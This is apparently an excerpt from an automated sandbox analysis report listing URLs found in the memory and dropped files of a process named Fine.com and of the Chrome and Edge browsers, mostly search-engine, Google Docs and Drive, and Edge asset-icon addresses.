          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
          Source: chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
          Source: Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: service_worker_bin_prod.js.20.dr, offscreendocument_main.js.20.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2740945971.000039F800020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
          Source: chrome.exe, 0000000F.00000003.2555588873.000003C800E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2558578187.000003C800E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
          Source: msedge.exe, 00000013.00000002.2740945971.000039F800020000.00000004.00000800.00020000.00000000.sdmp, manifest.json.20.drString found in binary or memory: https://chromewebstore.google.com/
          Source: chrome.exe, 0000000F.00000003.2538385867.00004050002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2538368744.00004050002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2740945971.000039F800020000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://clients2.google.com/service/update2/crx
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
          Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report
          Source: Reporting and NEL.22.dr, 2cc80dabc69f58b6_0.20.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://docs.google.com/
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
          Source: chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webappf
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
          Source: chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-autopush.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-0.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-1.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-2.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-3.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-4.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-5.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-daily-6.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-preprod.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive-staging.corp.google.com/
          Source: chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drString found in binary or memory: https://drive.google.com/
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 000003.log7.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
          Source: 000003.log7.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
          Source: 000003.log7.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
          Source: HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
          Source: HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.dr, HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
          Source: HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
          Source: 000003.log7.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.dr, HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
          Source: HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
